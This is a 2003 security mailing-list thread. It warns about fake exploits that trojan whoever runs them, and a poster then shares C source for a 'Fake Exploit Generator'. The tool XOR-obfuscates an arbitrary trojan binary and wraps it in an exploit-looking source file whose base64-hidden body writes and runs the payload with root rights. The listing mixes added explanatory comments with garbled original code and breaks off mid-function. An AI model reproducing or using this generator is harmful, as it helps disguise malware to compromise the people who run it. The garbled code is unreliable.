Re: [Full-Disclosure] Re: -1 day exploit - Warning

2003-06-13 Thread David Bernick

 Wow, I'd never run something that had a printf statement in it with
 
  print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
  0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: .$nick.:
 command\n;
 
 if you run this you deserve to get owned.  this guy could have at least
 xor'd the strings and base64 encoded them or SOMETHING.

The printf statement is in the shellcode. If you don't know C and/or hex
very well it looks semi-legit. The attached Perl code is the decoded
shellcode; it is not in the actual exploit. This is the perfect kind of
program to trojan little hacker wannabes on IRC.

and no one deserves to be owned. They just need to pay for highly paid
security consultants instead (shhh..kidding). 

d

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: -1 day exploit - Warning

2003-06-13 Thread gml
On Friday 13 June 2003 06:51 pm, David Bernick wrote:

Well anyway, I got inspired:

// Fake Exploit Generator
// [EMAIL PROTECTED]
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* Membership test for one base64 character: evaluates to non-zero when c is
 * NOT one of the 64 alphabet characters.  Note the hidden side effect: on a
 * hit, p is assigned the position of c inside b64string (NULL on a miss).
 * The length is fixed at 64, so the array's terminating NUL never matches. */
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))

/* Compile-time switch.  The only use visible in this part of the file is a
 * `char *cmd` declared under #ifdef BEAUTIFY in main(); presumably the
 * generated source is later run through `indent`, but that code is outside
 * this view -- confirm before relying on it. */
#define BEAUTIFY indent

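/* The base64 alphabet in sextet order (A = 0 ... / = 63).  The array is 65
 * bytes including the terminating NUL, so lookups must be bounded to 64
 * (as badchar() does with memchr) rather than use strchr, which would
 * accept NUL as a valid value.  The listing had lost the literal's quotes. */
char b64string[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";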

/* Base64 of the preamble written at the top of every generated file.  It
 * decodes to a "generated with Fake Exploit Generator" banner comment and
 * the same four #include lines this file starts with.
 * NOTE(review): the literal's quotes were lost in this listing; if it is a
 * NUL-terminated string, sizeof(header) is one more than the base64 length
 * and so not a multiple of 4 -- check how the decoder is called with it. */
static char header[] = {
Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr
Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1
ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K
};

/* Base64 of the C source emitted after the encoded byte array.  It decodes
 * to a wrapper that exits unless getuid() == 0, XORs the embedded array with
 * MAX (the key this generator writes from argv[3]), writes the result to a
 * tmpnam() path, chmod()s it 0755, runs it with system() and unlinks it.
 * The "usage: %s <target>" text it prints is camouflage only: the produced
 * "exploit" is itself the trojan this thread warns about, and any file
 * carrying this banner/shape should be treated as such.
 * NOTE(review): same quoting/sizeof caveat as header above -- if this is a
 * NUL-terminated literal, sizeof(body) is not a multiple of 4. */
static char body[] = {
dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK
CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g
bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy
KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0
KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK
CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w
ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs
Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3
cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw
NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu
dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo
KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K
};

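/*
 * Translate one base64 character to its 6-bit value.
 * Returns 0..63, or -1 when c is not one of the 64 alphabet characters.
 * '=' is deliberately not handled here; the caller treats padding itself.
 */
static int b64_sextet(unsigned char c)
{
    static const char alphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    /* Search exactly 64 bytes so the terminating NUL can never be matched. */
    const char *hit = memchr(alphabet, c, 64);

    return hit ? (int)(hit - alphabet) : -1;
}

/*
 * Decode base64 text into raw bytes.
 *
 * to:    output buffer.  Every 4 input characters produce 3 output bytes
 *        (padding positions are emitted as zero bytes and then discounted
 *        from the return value) and a NUL is appended after the last quad,
 *        so it must hold 3 * (len / 4) + 1 bytes.
 * from:  base64 text; only the 64 alphabet characters and '=' are accepted.
 * len:   number of characters of `from` to consume; must be a multiple of 4.
 *
 * Returns the number of decoded bytes with trailing '=' padding excluded,
 * or -1 when a character is outside the alphabet (the output is then
 * partially written and not NUL-terminated) or when len is not a multiple
 * of 4 (the complete quads have already been decoded and terminated).
 *
 * The listing had lost its operators (<<, >>, >=); this version restores
 * them and replaces the badchar() macro, which assigned to its second
 * argument as a hidden side effect, with a plain lookup helper.
 */
long b64dec (char *to, const char *from, unsigned int len)
{
    const unsigned char *in = (const unsigned char *)from;
    unsigned char *out = (unsigned char *)to;
    int padding = 0;

    for (; len >= 4; len -= 4) {
        unsigned v[4];

        for (int i = 0; i < 4; i++) {
            unsigned char c = *in++;

            if (c == '=') {
                v[i] = 0;
                /* Only '=' in the last two positions counts as padding;
                 * a '=' in the first two is silently read as value 0. */
                if (i >= 2) {
                    padding++;
                }
            } else {
                int s = b64_sextet(c);

                if (s < 0) {
                    return -1;
                }
                v[i] = (unsigned)s;
                /* A real character in a padding position restarts the count,
                 * so only '=' at the very end of the input is discounted. */
                if (i >= 2) {
                    padding = 0;
                }
            }
        }

        /* 4 x 6 bits -> 3 x 8 bits; the casts drop the shifted-out high
         * bits exactly as the original unsigned char accumulator did. */
        *out++ = (unsigned char)((v[0] << 2) | (v[1] >> 4));
        *out++ = (unsigned char)((v[1] << 4) | (v[2] >> 2));
        *out++ = (unsigned char)((v[2] << 6) | v[3]);
    }

    *out = 0;
    if (len) {
        return -1;
    }
    return (long)(out - (unsigned char *)to) - padding;
}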

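/*
 * Write one byte to fp as a C string escape: "\x" followed by exactly two
 * lowercase hex digits.
 *
 * c:  the byte to print.  It is taken as a raw byte, so negative values of
 *     a signed char come out as 80..ff rather than sign-extended.
 * fp: open output stream.
 *
 * The original reached the same output through three branches, one of which
 * formatted the sign-extended int with "%x" and picked characters 6 and 7
 * of the result -- correct only where int is 32 bits.  A single format on
 * the unsigned byte covers every case.
 */
void printhex(char c, FILE *fp)
{
    fprintf(fp, "\\x%02x", (unsigned)(unsigned char)c);
}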

int main(int argc, char *argv[])
{

FILE *trojan;
FILE *fakeexp;
char byte[0];
int count = 0;

char *out;

out = (char *)malloc(sizeof(body));
memset(out, 0, sizeof(out));


#ifdef BEAUTIFY
char *cmd;
#endif

if(argc  4 )
{
printf(usage: %s trojan fakeexp.c key\n, argv[0]);
printf(ex: %s trojan fakeexp.c 187\n, argv[0]);
exit(0);
}

trojan = fopen(argv[1], r);
fakeexp = fopen(argv[2], w);
if(trojan  fakeexp)
{

b64dec(out, header, sizeof(header));
fprintf(fakeexp, %s, out);
memset(out, 0, sizeof(out));

fprintf(fakeexp, \n#define MAX\t%s\n\n, argv[3]);
fprintf(fakeexp, static char shellcode[] = {\n);

while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));
fread(byte, 1, 1, trojan);
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate

if(count  15)
{
if(count == 0)
{
fprintf(fakeexp, \);
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, \\n);
count = 0;
}
}

fprintf(fakeexp, \\n};\n\n);

b64dec(out, body, sizeof(body));
fprintf(fakeexp, %s, out);